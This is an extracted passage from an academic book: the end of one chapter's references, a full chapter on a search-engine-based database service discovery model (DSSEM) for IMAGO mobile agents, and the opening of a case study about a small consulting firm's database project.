Facon, P., Laleau, R., & Nguyen, H. P. (1996). Mapping object diagrams into B specifications. In A. Bryant, & L. T. Semmens (Eds.), Proceedings of the Methods Integration Workshop. Electronics Workshops in Computing, BCS. Locuratolo, E. (1997, August 12-13). ASSO: Evolution of a formal database design methodology. In Proceedings of Symposium on Software Technology (SoST‘97), Buenos Aires. Locuratolo, E., & Rabitti, F. (1998). Conceptual classes and system classes in object databases. Acta Informatica, 35(3), 181-210. Locuratolo, E., & Matthews, B. M. (1999a). On the relationship between ASSO and B. In H. Jaakkola, H. Kangassalo, & E. Kawaguchi (Eds.), Information modelling and knowledge bases X (235-253). IOS Press. Locuratolo, E., & Matthews, B. M. (1999b). ASSO: A formal methodology of conceptual database design. In S. Gnesi & D. Latella (Eds.), Proceedings of the Federated Logic Conference, 4th International ERCIM Workshop on Formal Methods for Industrial Critical Systems (pp. 205-224). Locuratolo, E., & Matthews, B. M. (1999c). Formal development of databases in ASSO and B. In J. Wing, Woodcock, & J. Davies (Eds.), Lecture Notes in Computer Science, Vol. 1708, FM 99 — Formal methods (pp. 388-410). BerlinHeidelberg: Springer-Verlag. Locuratolo, E. (2001). MetaASSO: An approach for quality. IEI, TR 41. Locuratolo, E. (2002). Designing methods for quality. In H. Kangassalo, H. Jaakkola, E. Kawaguchi, & T. Welzer (Eds.) Information modelling and knowledge bases XIII (pp. 279-295). IOS Press. Locuratolo, E. (2004). Model transformations in designing the ASSO methodology. In P. van Bommel (Ed.), Transformation of knowledge,
455
Database Design Based on B
information and data: Theory and applications (pp. 283-302). Hershey, PA: Information Science Publishing. Mammar, A., & Laleau, R. (2003). Design of an automatic prover dedicated to the refinement of database applications. In K. Araki, S. Gnesi, & D. Mandrioli (Eds.), CEDRIC-IIE (CNAM), Lecture Notes in Computer Science, Vol. 2805, FME 2003: Formal Methods (pp. 835-853), Evry, France.
Nixon, B., & Mylopoulos, J. (1990). Integration issues in implementing semantic data models. Advances in database programming languages (pp. 187-217). ACM Press. Rumbaugh, J., & Booch, G., & Jacobson, I. (1999). The unified modelling language reference manual. Reading, MA: Addison-Wesley. Shore, R. (1996). An object-oriented approach to B. In H. Habrias (Ed.), Proceedings of the 1st Conference on the B-Method, Nantes, France.
This work was previously published in Database Modeling for Industrial Data Management: Emerging Technologies and Applications, edited by Z. Ma, pp. 35-61, copyright 2006 by Information Science Publishing (an imprint of IGI Global).
456
457
Chapter 2.3
A Database Service Discovery Model for Mobile Agents Lei Song University of Guelph, Guelph, Canada Xining Li University of Guelph, Guelph, Canada Jingbo Ni University of Guelph, Guelph, Canada
ABSTRACT One of the main challenges of mobile agent technology is how to locate hosts that provide services requested by mobile agents. Traditional service location protocols can be applied to mobile agent systems in order to explore the service discovery issue. However, because of their architecture deficiencies, they adequately do not solve all the problems that arise in a dynamic domain such as database location discovery. From this point of view, we need some enhanced service discovery techniques for the mobile agent community. This article proposes a new model for solving the database service location problem in the domain of mobile agents by implementing a service discovery module based on search engine techniques. As a typical interface provided by a
mobile agent server, the service discovery module improves the decision ability of mobile agents with respect to information retrieval. This research is part of the IMAGO system, an infrastructure for mobile agent applications. This article focuses on the design of an independent search engine, IMAGOSearch, and discusses how to integrate service discovery into the IMAGO system, thus providing a global scope service location tool for intelligent mobile agents.
INTRODUCTION The number of services that will become available in distributed networks (in particular, on the Internet) is expected to grow enormously. Besides classical services such as those offered
A Database Service Discovery Model for Mobile Agents
by printers, scanners, fax machines, and so on, more and more services will be available nowadays. Examples are information access via the Internet, music on demand, Web services, and services that use computational infrastructure that has been deployed within the network. Moreover, the concept of service in mobile agent systems, which will be described in this article, has come into prominence recently. The mobile agent model is a new distributed software development paradigm as compared to the traditional client-server model. Instead of calling operations on servers with some form of synchronization, the user passes on his or her goal to an agent that can migrate within the computational environment and knows how to handle it without being controlled. In brief, mobile agents are active, autonomous, intelligent objects that are able to move between locations in a so-called agent system. Mobile agents must interact with their hosts in order to use their services or to negotiate services with other agents (Song & Li, 2004). Discovering services for mobile agents comes from two considerations. First, the agents possess local knowledge of the network and have a limited functionality, since only agents of limited size and complexity can migrate efficiently in a network and have little overhead. Hence, specific services are required that aim at deploying mobile agents efficiently in the system and the network. Second, mobile agents are subject to strong security restrictions, which are enforced by the security manager. Thus, mobile agents should find services that help to complete security-critical tasks other than execute code that might jeopardize remote servers. Following this trend, it becomes increasingly important to give agents the ability to find and make use of services that are available in a network (Bettstetter & Renner, 2000). Some of the mobile agent systems developed in the last few years are Aglets (Lange & Ishima, 1998), Voyager (Recursion Software Inc, 2005), Grasshopper (Baumer et al., 1999), Concordia (Mitsubishi Electric, 1998), and D’Agents (Gray
458
et al., 2000). Research in the area of mobile agents looked at languages that are suitable for mobile agent programming, and languages for agent communication. Much effort was put into security issues, control issues, and design issues. Some state-of-the-art mobile agent systems focus on different aspects of the above issues (e.g., Aglets on security, D’Agents on multi-language support, Grosshopper on the implementation of the FIPA [FIPA, 2002], and MASIF [Milojicic et al., 1998] standard). However, few research groups have paid attention to offering an environment to combine the concept of service discovery and mobile agent paradigm. Most existing mobile agent systems require their programmers to specify agent migration itinerary explicitly. This makes mobile agents weak in their ability to sense their execution environment and to react autonomously to dynamic distributed systems. In this article, we propose a new service discovery model DSSEM (discovery service via search engine model) for mobile agents. DSSEM is based on a search engine, a global Web search tool with centralized index and fuzzy retrieval. This model especially aims at solving the database service location problem and is integrated with our IMAGO (intelligent mobile agent gliding online) system. The IMAGO system is an infrastructure for mobile agent applications. It includes code for the IMAGO server—a multi-threading logic virtual machine, the IMAGO-Prolog—a Prologlike programming language extended with a rich API for implementing mobile agent applications, and the IMAGO IDE, a Java-GUI-based program from which users can perform editing, compiling, and invoking an agent application. In our system, mobile agents are used to support applications, and service agents are used to wrap database services. Service providers manually register their services in a service discovery server. A mobile agent locates a specific service by submitting requests to the service discovery server with the description of required services. Web pages are used to advertise services. The design goal of DSSEM is
A Database Service Discovery Model for Mobile Agents
to provide a flexible and efficient service discovery protocol in a mobile agent environment. The rest of the article is organized as follows. The next section presents a brief background related to this article and discusses the problem of service discovery in mobile agent systems. The section Disvoery Services Via Search Engine Model (DSSEM) introduces DSSEM and compares it with several service discovery protocols (SDPs) currently under development. The comparison criteria include functionality, dependency on operating systems, and platforms. The section titled Service Discovery in the IMAGO system gives an overview of the design of service discovery module and integration with the IMAGO system. Finally, the last section provides some discussion and concluding remarks as well as future work.
BACKGROUND AND MOTIVATION The general idea of distributed services is that an application may be separated from the resources needed to fulfill a task. These resources are modeled as services, which are independent of the application. Services do not denote software services alone but any entity that can be used by a person, a program, or even another service (Hashman & Knudsen, 2001). Service discovery is a new research area that focuses not just on offering plug-and-play solutions but aims to simplify the use of mobile devices in a network, allowing them to discover services and also to be discovered (Ravi, 2001). In general, the service usage model is rolebased. An entity providing a service that can be utilized by other requesting entities acts as a provider. Conversely, the entity requesting the provision of a service is called a requester. To provide its service, a provider, in turn, can act as a requester, making use of other services. To form a distributed system, requesters and providers live on physically separate hosting devices. Provid-
ers from time to time should advertise services by broadcasting to requesters or by registering themselves on third-party servers. From requests’ point of view, it must do the following: • • •
Search and browse for services Choose the right service Utilize the service
Before a service can be discovered, it should make itself public. This process is called service advertisement. The work can be done when services are initialized or every time they change their states via broadcasting to anyone who is listening. A service advertisement should consist of the service identifier plus a simple string saying what the service is or a set of strings for specifications and attributes. An example is given in Table 1. There are several ways that a client looks up services that it requires. If the client knows the direct address of services, it can make direct requests, or it can listen to broadcasting advertisements and select those that it needs. The common method, however, is that the client forms a description of the desired service and asks a known discovery server if there is any service matching the request. A variety of service discovery protocols (SDPs) are currently under development by some companies and research groups. The most wellknown schemes are Sun’s Java-based JiniTM (Sun, 1999), Salutation (Salutation Consortium, 1998), Microsoft’s UPP (Universal Plug and Play, 2000), IETF’s draft Service Location Protocol (SLP) (Guttman et al., 1999), and OASIS UDDI (OASIS, 2005). Some of these SDPs are extended and apTable 1. A typical advertisement of service Identifier: office-printer-4 Type: printer/postscript/HP20 Speed: 24ppm Colour: yes
459
A Database Service Discovery Model for Mobile Agents
plied by several mobile agent systems to solve the service discovery problem. For example, GTA/ Agent (Rubinstein & Carlos, 1998) addresses the service location issue by extending SLP, a simple, lightweight protocol for automatic maintenance and advertisement of intranet services. Though SLP provides a flexible and scalable framework for enabling users to access service information about existence, location, and configuration, it only possesses a local function for service discovery and is not scalable up to global Internet domain, because it uses DHCP and multicast instead of a central lookup mechanism. AETHER (Chen, 2000) makes an improvement to Jini by building a dynamic distributed intelligent agent framework. Jini provides a flexible and robust infrastructure for distributed components to find each other on the Internet. However, it relies on the use of standard Java-based interfaces implemented by both clients and servers in their work. This requires existing systems to be modified for use with Jini; however, a significant amount of the production software currently available around the world is unlikely to be modified. After a study of different SDPs and mobile agent systems that are adopting these methods, we found that several problems cannot be solved easily by the existing protocols due to their limitations. First of all, most existing works support an attribute-based discovery as well as a simple name lookup to locate a service. Usually, there is only a set of primitive attribute types in the service description, such as string and integer, to characterize a service. Thus, the service discovery process is achieved primarily by type matching, string comparison, or integer comparison. Here, we define a service description as a sequence of flags or codes that can be multicast to service requesters or registered on a third-party server for advertisement purposes. Generally speaking, a service description is composed of two parts: property and access. The property of a service description describes the type, characteristics, constraints, and so forth of a service, which will
460
be published in the service discovery server for advertising purposes. The access of a service is more complicated. It may contain multiple access method tags, as there could be multiple ways to invoke a service (e.g., using the interface of services, downloading the client-proxy code, locating a database, RPC, RMI, or URL location). For example, Table 2 shows a service description in SLP, where the value of type tag (i.e., service:printer) indicates the property of the service. It also contains some other property tags to describe this resource in detail, such as paper per minute or color support. In the searching phase, much of the power of SLP derives from its ability to allow exact selection of an appropriate service from among many other advertised services with the same tags. This is done by requesting only the service or services that match the required keywords and attribute values specified by requesters. These keywords and attribute values can be combined into boolean expressions via “AND” and “OR” or common comparison operators “” or substring matching. Considering the previous example again, the search request from a requester could be “< service:printer, bmw, ( (name = lj4050) (page per min.>8)) >”. A further step in SDP’s development is using eXtensible Markup Language (XML) to describe services. In fact, Web service discovery protocol UDDI, its description language WSDL, as well as the communication protocol SOAP are all based on XML. In addition, an XML description can be converted to a Java document object model (DOM) so that it can be merged into a service
Table 2. Example of SLP service description type = service: printer scope = administrator, bmw name = lj4050 paper per min. = 9 Colour-support = yes usage = //li4050.com: 1020/queue1
A Database Service Discovery Model for Mobile Agents
registry system. The example in Table 2 can be described in XML as follows: service: printer administration, bmw lj4050 ...... //li4050.com: 1020/queue1
No matter what kind of description format is applied, the lack of rich representation for services has not been changed. The problem arising directly in our project is that these protocols are not adequate to advertise some special services such as database services. A database system already has a well-defined interface, and all a mobile agent requires is a way of finding the location of specific databases and deciding where to move. In this situation, the only way we can accomplish this is by registering the database’s name and attributes for future discovery. However, for a database service, people care more about the content of the database than its name or structure. Considering an example of a bookstore, before placing an order to the bookstore, customers would like to know if the books they require are available in the store by checking the summary of all books with some keywords or a fuzzy search criterion. From this point of view, a simple string identifier or XML identifier cannot meet the requirement. The second problem is ranking. After requesters have searched all services that may be required, they still need to select the right one for utilization. Just imagine that over the entire Internet, tens of thousands of providers could publish their services by their own will. We should be able to know which ones provide the most realistic and highest quality services that users want. Obviously, moving to the hosts one by one to find out the required information is not a wise choice. Therefore, generating a service rank is essential. However, none of the existing SDPs offers such a mechanism for ranking discovered
services. They are satisfied only with finding a service without considering whether the service would be able to serve the requester. The most significant contribution of our research is that we enrich the service description by using Web page’s URL (later the search engine will index the content referenced by this URL) to replace the traditional string-set service description in mobile agent systems. Because of their specific characteristics, such as containing rich media information (text, sound, image, etc.), working with the standard HTTP protocol, and being able to reference each other, Web pages may play a key role as the template of the service description. On the other hand, since the search engine is a mature technology and offers an automated indexing tool that can provide a highly efficient ranking mechanism for the collected information, it is also useful for acting as the directory server in our model. Of course, DSSEM also benefits from previous service discovery research in selected areas but is endowed with a new concept by combining some special features of mobile agents as well as integrating service discovery tools with agent servers.
DISCOVERY SERVICES VIA SEARCH ENGINE MODEL (DSSEM) As the most important media type on the Internet today, hypertext Web pages are posted to advertise the information by industries and individuals. Though millions of them are published on the Internet, these Web pages still increase rapidly every day for a variety of reasons. They are spidered and indexed by commercial search engines such as Google, Yahoo!, AltaVista, and so forth. Users easily can find Web pages’ locations by submitting the search request to those search engines. In principle, if we install a lightweight search engine on the service discovery server that can retrieve Web pages posted by service providers and design a Web search interface for the incom-
461
A Database Service Discovery Model for Mobile Agents
ing mobile agents, then the problems described previously could be solved in an easy way. In this situation, service providers don’t need to register the service description on the service discovery server. Instead, they register the URLs of their Web sites that advertise all the information concerning services. As a middleware on the service discovery server, the search engine periodically will retrieve the document indicated in the URLs and all their referencing documents, parse all the tags and words in the documents, and set up the relationship between the keywords and the host address of these service providers. On the other hand, mobile agents can utilize the system interface by accessing the search engine’s database and obtain a destination itinerary that includes a list of ranked host addresses of the service providers. Based on the previous discussion, Figure 1 shows the service discovery process of DSSEM. The current version of DSSEM concentrates on the database service discovery. The database service advertisement information can be converted easily to Web page representation. The specific characteristic of a Web page is that it contains rich media information and flexible layout and can reference each other. As an example in Figure 2, we find that a two-dimensional database table can be converted into a one-dimensional Web page. Moreover, some binary data stored in the database, such as image, can be extracted from higher-dimensional space to a lower-dimensional space as the text representation in the Web page.
Figure 1. Service discovery process of DSSEM
462
To use Web pages as a medium to advertise services for service providers, we should modify the template in the service description of SLP. The remarkable change is that some properties once represented by strings or XML language now are represented as a Web site’s home URL. Table 3 illustrates a service description template of a bookstore example. The proposed model is similar to SLP and Jini with respect to the service discovery process; however, it extends those protocols by setting up a centralized, seamless, scalable framework on the Internet. Unlike some multicasting services protocols, the centralized service discovery server makes DSSEM service discovery available on the Internet worldwide. The process of registration is similar to UDDI, and the process of discovery is similar to the lookup service in Jini. Besides that, features of mobile agents bring DSSEM other incomparable advantages. First, code mobility is almost impossible in most distributed systems. Therefore, a client must download the resource drivers to invoke services. Although RPC or RMI mechanism can help to call services remotely, it might consume tremendous network bandwidth when dealing with services involving a huge amount of data, such as database services. DSSEM goes one step further. It makes agents migrate to the destination hosts and utilize services locally. Second, the security issue is seldom considered in current service discovery protocols. However, Figure 2. Web representation of database
A Database Service Discovery Model for Mobile Agents
Table 3. An example of service description type = service: database name = bookstore URL = //www.cis.uoguelph.ca/ location(URL)= www.uoguelph.ca interface = dp_get_set(Handler, ‘SQL statement’, Result_handler)
a mobile agent server requires a strict security concern for authorization and authentication when it accepts the incoming agents and provides them services for utilization.
SERVICE DISCOVERY IN THE IMAGO SYSTEM IMAGO is a mobile agent system in which agents are programs written in IMAGO Prolog that can move from one host on the Internet to another. Briefly speaking, an agent is characterized as an entity that is mature (autonomous and selfcontained), mobile, and bears the mental model of the programmer (intelligent) (Li, 2001). From an application point of view, the IMAGO system consists of two kinds of agent servers: stationary server and remote server. The stationary server of an application is the home server where the application is invoked. On the other hand, agents of an application are able to migrate to remote servers. Like a Web server, a remote server must have either a well-known name or a name searchable through the service discovery mechanism. Remote servers should provide services for network computing, resource sharing, or interfaces to other Internet servers, such as Web servers, database servers, and so forth. In fact, an IMAGO server, no matter if it is stationary or remote, is a multithreading logical virtual machine to host agents and provides a protected agent execution environment. The IMAGO system is portable in the sense that its servers run on virtually all Linux boxes with Gnu C compiler and Posix package. Tasks of an IMAGO server
include accepting agents, creating a secure run time environment, and supervising agent execution. It also must organize agent migration from or to other hosts, manage communications among agents, authenticate and control access for agent operations, recover agents and the information carried by them in case of network and computer failures, and provide some basic services for the agents, such as database service and discovery service. The architecture of the IMAGO server is shown in Figure 3. In this architecture, the system modules are configured to deal with different tasks. The core module of the IMAGO server is the scheduler. It maintains an agent list, where each entry on the list matches different stages of the life cycle of an agent, such as creation, execution, memory-related processing (i.e., expansion, contraction, or garbage collection), termination, and migration. The agent list is sorted with respect to system-defined priorities. For example, the highest priority is given to agent migration, followed by agent creation and execution, memory manipulation, and, finally, database service and service discovery. In the early phase of system design, database operation becomes the major service to applications in the IMAGO system. Thus, the problem of service discovery focuses on how to find such services effectively. Once a database server has been found, agents may migrate to that remote server and invoke database access locally through built-in primitives. As an example, the following code shows a typical database access issued by an IMAGO agent: dp_connect(URL, DatabaseName, UserName, Password, AccessMode), //connection dp_get_set(Handler, ‘select …..’, ResultHandler), //data access dp_disconnect(Handler). //disconnection
Before a database service is advertised, the service provider should fill out a registration
463
A Database Service Discovery Model for Mobile Agents
Figure 3. The infrastructure of IMAGO system
Figure 4. The processes of Web search module
form and submit the form to an IMAGO service discovery server. The contents of the form include service type, database name, URL of the service provider host, access mode, HTTP URL of the service Web site, interface function, and the verification information. We chose URL as the host address, since it is compatible with most commonly used Web browsers and independent of address families (i.e., IP, IPv6, and IPX). To illustrate how DSSEM works, Figure 4 shows the steps involved in the service registration and discovery process in our IMAGO system. A service discovery server is called the service location host. In order to gather useful information, the search engine, IMAGOSearch, should be installed independently on the service location host. This search engine maintains a special database system designed to index Internet addresses (i.e., URLs, Usenet, Ftp, image locations, etc.). Like traditional search engines, IMAGOSearch consists of three main components: spider, indexer and searcher. They are grouped into two modules, where one module includes spider and indexer, running in the background of a service location host, and the other module is the searcher, running in the foreground to provide discovery services. First, the spider gets the URLs from a URL list that contains initial Web site URLs registered by service providers. The spider then traverses along these URLs in the breadth-first manner and loads the referred hypertext documents into the service discovery
server. The salient words of these documents are extracted by the indexer. Some related information such as text also is saved into the database for user retrieval. In addition, the indexer looks for URL anchors that reference other documents and adds them to the URL list. Besides considering the weight of each word in the documents (e.g., a word occurrence in the title should be assigned a higher weight than that which occurs in the body), IMAGOSearch also pays attention to positions of each word and its relative distance during ranking. The ranking algorithm we use is called the shortest-substring ranking (Charles et al., 2000), which offers a simple way to weight each Web page based on a search criteria and total them up to form Web site ranking. The searcher behaves as a bridge between the IMAGO server and the search engine. It is responsible for accepting the search requests from mobile agents, querying the database, ranking search results, and, finally, returning a destination itinerary. The application programming interface for mobile agents is a built-in predicate; namely, Web_ search(query, number, Result), where query is a compound term, such as locate(“tsx”, “stock transaction”, “imago server”), number is an integer indicating the maximum number of results expected, and Result is a variable to hold the returned values. When an agent issues a Web_search(…) predicate, the agent is blocked,
464
A Database Service Discovery Model for Mobile Agents
and control is transferred to the service discovery module of the hosting IMAGO server. This module will communicate with the searcher, wait for search results, and resume the execution of the blocked agent. Search results will be delivered to the agent in the form of a list, where list entries are ranked in terms of priorities from high to low.
DISCUSSION AND CONCLUSION In this article, we have discussed the design of a service discovery protocol—DSSEM—and its implementation in the IMAGO system. Table 4 summarizes the main features of selected protocols compared with DSSEM. From an implementation point of view, the most critical issue about the performance of a search engine is the quality of search results. However, we cannot make a comparison with other major commercial search engines, since they are operating at different levels. Thus, user evaluation is beyond the scope of this article. In order to show that our search engine does return useful information, Table 5 gives the experimental results for a query using the keywords imago lab. The results show that all server URLs have come from reasonably high-quality Web sites, and, at last check, none were broken links. An Rw value is calculated according to word
Table 5. Search results for imago lab keyword draco.cis.uoguelph.ca
Rw= 13.8
100%
www.cis.uoguelph.ca
Rw = 10.65
77%
www.uoguelph.ca
Rw= 4.6
33%
www.cas.mcmaster.ca
Rw= 4.23
30.6%
occurrence, weight, and a factor value measuring the distance of keywords by a ranking algorithm (Charles et al., 2000). We define the result that has the highest Rw value as the highest priority and assign it a 100% rate; therefore, the percentage of other results are rated relatively. Of course, a true test of the quality of a search engine would involve extensive experiments, analysis, and user evaluation, which is part of our future work. Aside from the search quality, IMAGOSearch is designed to scale up cost effectively, as the sizes of Web pages grow. Because IMAGOSearch only indexes Web servers registered by IMAGO Server users, we do not need to worry about indexed pages exceeding the maximum size of the database. One endeavor that we are undertaking is to reduce the table redundancy and to use the storage efficiently. Our experiment shows that indexing 22,000 different documents consumes only 140Mb disk space. The search time is dominated mostly by the performance of CPU, disk I/O, and the underlying database system.
Table 4. Comparison of different SDPs Feature
SLP
Jini
Salutation
UPnP
DSSEM
TCP/IP
Independent
Independent
TCP/IP
SITP
Independent
Java
Independent
Independent
Independent
Dependent
Independent
Dependent
Dependent
Dependant
No
On demand
No
No
Yes
Srv attributes searchable
Yes
Yes
Yes
No
Yes
Leasing concept
Yes
Yes
No
Yes
Yes
Event notification
No
Remote event
Periodic and automatic
Publish events
No
Security
No
Java based
Authentication
No
Strict
Service type and attribute matching
Interface Type and attribute matching
Functional units and Attributes within it
Description in XML
Webpage description and fuzzy matching
Network transport Programming language OS and platform Code mobility
Service Description and Scope
465
A Database Service Discovery Model for Mobile Agents
When a mobile agent wants to locate certain services, it first must move to the service discovery server and then make a local query and migrate to the destination hosts after obtaining the itinerary. This brings us to the problem that, as a central unit, the service discovery server might become a bottleneck, especially when it is handling thousands of Web pages every day and simultaneously hosting as many incoming mobile agents as possible. A possible solution is to duplicate service discovery servers. Replicas not only make the service discovery mechanism very efficient but also increase the ability of fault tolerance. The results of our work are encouraging, and further studies in this field are being planned. First, the current implementation of search engine deals with only the AND logical relationship between search strings; it could be enhanced to parse some complex search criteria that combine keywords with boolean expressions (AND, OR) and conditional expressions (=, substring match, etc.). Second, since a database contains multidimensional information, how to reflect dimensional relationship by a flat Web page is a big challenge. A possible way to address this issue is to use XML metadata to describe the database dimension.
ACKNOWLEDGMENT We would like to express our appreciation to the Natural Science and Engineering Council of Canada for supporting this research.
REFERENCES Baumer, C., Breugst, M., & Choy, S. (1999). Grasshopper—A universal agent platform based on OMG MASIF and FIPA standards. Proceedings of the First International Workshop on Mo-
466
bile Agents for Telecommunication Applications (MATA’99) (pp. 1-18). Bettstetter, C., & Renner, C. (2000). A comparison of service discovery protocols and implementation of the service location protocol. Proceedings of the EUNICE 2000, Sixth EUNICE Open European Summer School, The Netherlands. Charles L., Clarke, A., & Gordon V. (2000). Shortest substring retrieval and ranking. ACM Transactions on Information Systems (pp. 44-78). Chen, H. (2000). Developing a dynamic distributed intelligent agent framework based on Jini architecture . Master’s thesis, MD: University of Maryland. FIPA. (2002). Agent management specification. Retrieved from http://www.fipa.org Gray, R., Cybenko, G., & Kotz, D. (2002). D’agents: Applications and performance of a mobile-agent system. Software—Practice and Experience, 32(6), 543-573 Guttman, E., Perkins, C., & Veizades, J. (1999). Service location protocol, version 2 (white paper). IETF, RFC 2608. Hashman, S., & Knudsen, S. (2001). The application of Jini technology to enhance the delivery of mobile services [white paper]. Retrieved , from http://wwws.sun.com/ John, R. (1999). UPnP, Jini and salutaion—A look at some popular coordination framework for future network devices [technical report]. California Software Labs. Lange, D., & Ishima, M. (1998). Programming and deploying Java, mobile agents with aglets. Addison-Wesley. Li, X. (2001). IMAGO: A prolog-based system for intelligent mobile agents. Proceedings of the Mobile Agents for Telecommunication Applications (MATA’01), Lectures Notes in Computer Science, 21-30. Springer Verlag
A Database Service Discovery Model for Mobile Agents
Li, X. (2003). IMAGO prolog user’s Mannual, version 1.0 [technical report]. University of Guelph.
Recursion Software Inc. (2005). Voyager product documentation. Retrieved from http://www.recursionsw.com/voyager_Documentation.html
Milojicic, D., Breugst, M., & Busse, I. (1998). MASIF: The OMG mobile agent system interoperability facility. Proceedings of the Second International Workshop on Mobile Agents (pp. 50-67).
Rubinstein, M., & Carlos, O. (1998). Service location for mobile agent system. Proceedings of the IEEE/SBT International Telecommunications Symposium (ITS’98) (pp. 623-626).
Mitsubishi Electric ITA. (1998). Mobile agent computing (white paper). OASIS UDDI. (2005). UDDI [white paper]. Retrieved from http://www.uddi.org Ravi, N. (2001). Service discovery in mobile environments [technical report]. Arlington, TX: University of Texas, Arlington.
Salutation Consortium. (1998). Salutation architecture overview [white paper]. Retrieved from http://www.salutation.org/whitepaper/originalwp.pdf Sun Technical. (1999). Jini architectural overview [white paper]. Retrieved from http://www.sun. com/jini/ Universal Plug and Play Forum. (2000). Universal plug and play device architecture, version 0.91 (White Paper).
This work was previously published in International Journal of Intelligent Information Technologies, Vol. 2, Issue 2, edited by V. Sugumaran, pp. 16-29, copyright 2006 by IGI Publishing(an imprint of IGI Global).
467
468
Chapter 2.4
A Database Project in a Small Company
(or How the Real World Doesn’t Always Follow the Book) Efrem Mallach University of Massachusetts Dartmouth, USA
EXECUTIVE SUMMARY The case study describes a small consulting company’s experience in the design and implementation of a database and associated information retrieval system. Their choices are explained within the context of the firm’s needs and constraints. Issues associated with development methods are discussed, along with problems that arose from not following proper development disciplines.
visibility into its ultimate uses. Design decisions made early in the project without careful consideration were difficult to change, or were never changed later, even after their negative impact was evident. The system provided real value to its users, but use of proper development disciplines could possibly have reduced some problems while not reducing that value.
ORGANIZATION BACKGROUND INTRODUCTION This case describes the development of a database system used to track and analyze press comments by experts on the information technology industry. The system was developed in a haphazard fashion, without the benefit of professional developers, originally based on a loosely organized collection of data assembled by a staff member, with little
The job of an industry analyst (Columbus, 2004) is to interpret goings-on in a particular field to nonexperts, advising them on where the field is going and which vendors, products, or services are most likely to suit a particular user need. Because information and communication technologies (ICTs) are complex, rapidly changing, and “mission-critical” to businesses of all types, analysts1 are especially important in that field.
Their recommendations move large amounts of revenue toward vendors whose products and services they favor, or away from those about whom they feel negatively. In 2005, there are about 500 (Kensington Group, 2004) industry analysis firms (also known as research firms when this is unlikely to cause confusion with other types of research) worldwide. Total industry revenue can be estimated at roughly $3 billion, based on published annual revenue of industry leader Gartner being about $900 million (Gartner Group, 2005), and the existence of several privately held firms employing over 100 analysts each, such as International Data Corporation with over 600 (IDC, 2005) and Forrester Research with nearly 200 (Forrester, 2005). It is reasonable to estimate that the industry employs at least 2,000 analysts, probably considerably more. As a result of analysts’ influence on the market, ICT vendors pay a great deal of attention to them. Most large vendors have a dedicated analyst relations department. The efforts of Alcatel (2005), Computer Associates (2005), Sybase (2005), and Hewlett-Packard (2005), all in different segments of the IT industry, are representative. Vendors spend large sums courting analysts, visiting them, putting on events for them at which they showcase their products, and generally trying to convince them that the vendor’s offering is superior. Since they want to do this as well as possible, vendors often look to outside advisors (Insight Marketing, 2005; Tekrati, 2005) to evaluate and improve their analyst relations programs. The organization discussed in this case, which will be referred to2 as Balmoral Group, Inc., was such a consulting firm. It specialized in advising ICT vendors about the impact of industry analysts on their business, and on how to work with them most constructively. As the case opens in 1999, it employed 5 full-time people plus a few part-time contractors for peak survey work. At the end of the case in the summer of 2003, it employed 18, over half of whom were primarily involved with the system described here.
Balmoral Group was founded when its two cofounders, Isabelle Oliviera and Lawrence Ackerman, met. Ackerman had a solo consulting practice in this field. Among other things, he had begun conducting multiclient studies in which analysts told him what they needed in terms of support from vendors, and rated vendors based on how well they provided this support. Oliviera worked for a large hardware vendor and was about to leave it to start her own consulting practice in the same field. Since the two were on opposite coasts of the U.S., they chose to join forces and named their joint venture Balmoral Group. Ackerman was named CEO; Oliviera president. A few years later, in 1996, they incorporated to set the stage for further expansion. The firm’s initial offerings included the multiclient studies originally done by Ackerman, workshops at which vendor analyst relations professionals could learn the elements of their profession, and custom consulting services. Among the questions that arose frequently in consulting work were “Which analysts are most influential in our space, which are most likely to be quoted about us, and what are they saying?” Balmoral Group, at that time, lacked a systematic way to approach these questions. The database system described in the rest of this case was originally intended to answer such questions. It eventually provided another offering for the firm that accounted for a large fraction of its income by 2002 and led to expanding its headcount to over 15 people. However, its development proceeded in an unplanned fashion and was characterized by technical decisions that, in retrospect, might better have been made differently. The situation described in the case is in this respect typical of many small organizations. The system development processes described in books are often followed, at least in principle, by larger firms with dedicated MIS staffs, but the smallbusiness reality is not usually as professional in that respect.
469
A Database Project in a Small Company
Oliviera and Ackerman remained in charge of the firm through 2002. In 2000 they divided their responsibilities, with Oliviera in charge of external activities including sales and customer relations, and Ackerman in charge of internal ones including research projects and databases. In early 2002, Oliviera took over as sole manager while Ackerman prepared for a career change. As a prearranged part of this orderly transition, he remained with the firm through the period covered by this case, leaving in the summer of 2003. Other than the two cofounders, only one other employee had any management responsibilities. In 2000, a research staff member, Tamara Hudson, was given the title of project manager and put in charge of many of the database activities described later in this case. Because of the small size of the organization—18 people at most, about half of them working in support positions on the database described in this case—more of a formal management structure was not necessary. Figure 1 shows an organization chart of the firm
as it was toward the end of this case. At that time its annual revenue was in the high six figures in U.S. dollars. Strategic planning as such did not exist at Balmoral. At the start of the case and for most of its existence, it had no direct competition. Some public relations agencies offered overlapping services, but Balmoral’s specialization in analyst relations tended to remove general agencies from direct competition. In addition, since Balmoral had a policy not to offer agency services to its clients, agencies tended to treat it more as a partner than as a competitor. Balmoral had a multiplatform policy for its information technology. Staff members (almost all of whom worked from their homes) could choose either Windows3 or Macintosh systems, as they preferred. There was no consistency in individual choices of hardware or OS. The firm reimbursed employees for whatever they chose. Consistency existed at the application level, however. The firm required multiplatform applica-
Figure 1.
Lawrence Ackerman, CEO
Isabelle Oliviera, President Christine Hardy, Admin. Asst.
Research Analysts
Sandi Carpenter, Database Coord.
Tamara Hudson, Project Manager
Readers
470
A Database Project in a Small Company
tions. It used Microsoft Office for word processing, spreadsheets, and presentations; PageMaker for document layout; and Dreamweaver for Web page development. E-mail and Web browser software were not standardized as that was not required for interoperability. With occasional exceptions involving graphics embedded in Word documents, the multiplatform approach caused no problems.
SETTING THE STAGE In early 1999, CEO Ackerman was reading InfoWorld while waiting between flights in the American Airlines lounge at Chicago’s O’Hare Airport. While he was used to seeing analysts quoted frequently in the trade press, for the first time he realized that listing and organizing their comments could provide insight into their influence areas. He opened his laptop and created a spreadsheet to capture information about these quotes. It had these columns: • • • • • • • • • • • • •
Analyst Name Job Title Firm Location (city; also state if U.S., country if not U.S.) Topic of Article (a few words indicating what the article overall was about) Article Title Publication Name Date of Issue, Volume, Number (as applicable) Writer(s) Point(s) Made (summary of what the analyst was quoted as saying) Vendor(s) Mentioned Entered by (initials, for the possibility that others might enter quotes at some time) Date Entered
